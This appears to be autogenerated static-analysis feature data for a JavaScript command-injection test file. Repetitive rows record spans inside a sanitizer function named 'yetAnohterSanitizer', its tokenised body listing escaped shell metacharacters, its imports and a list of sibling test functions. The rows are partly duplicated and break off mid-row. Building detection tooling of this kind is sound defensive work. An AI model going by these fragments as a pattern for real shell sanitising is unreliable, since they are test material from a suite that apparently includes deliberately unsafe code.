+| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:20 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:20 | s = str \|\| '' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:20 | s = str \|\| '' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:20 | s = str \|\| '' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:20 | s = str \|\| '' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:20 | s = str \|\| '' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:12:374:14 | str | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:12:374:14 | str | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:12:374:14 | str | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:12:374:14 | str | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:12:374:14 | str | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:12:374:20 | str \|\| '' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:12:374:20 | str \|\| '' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:12:374:20 | str \|\| '' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:12:374:20 | str \|\| '' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:12:374:20 | str \|\| '' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:19:374:20 | '' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:19:374:20 | '' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:19:374:20 | '' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:19:374:20 | '' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:19:374:20 | '' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:11 | result | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:11 | result | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:11 | result | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:11 | result | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:11 | result | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:16 | result | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:16 | result | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:16 | result | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:16 | result | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:16 | result | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:16 | result = '' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:16 | result = '' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:16 | result = '' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:16 | result = '' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:6:375:16 | result = '' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:15:375:16 | '' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:15:375:16 | '' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:15:375:16 | '' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:15:375:16 | '' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:375:15:375:16 | '' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:11 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:11 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:11 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:11 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:11 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:15 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:15 | i | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:15 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:15 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:15 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:15 | i = 0 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:15 | i = 0 | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:15 | i = 0 | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:15 | i = 0 | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:11:376:15 | i = 0 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:15:376:15 | 0 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:15:376:15 | 0 | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:15:376:15 | 0 | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:15:376:15 | 0 | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:15:376:15 | 0 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | i | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | i | fileImports | ./isImported ./lib2.js async-execute child_process 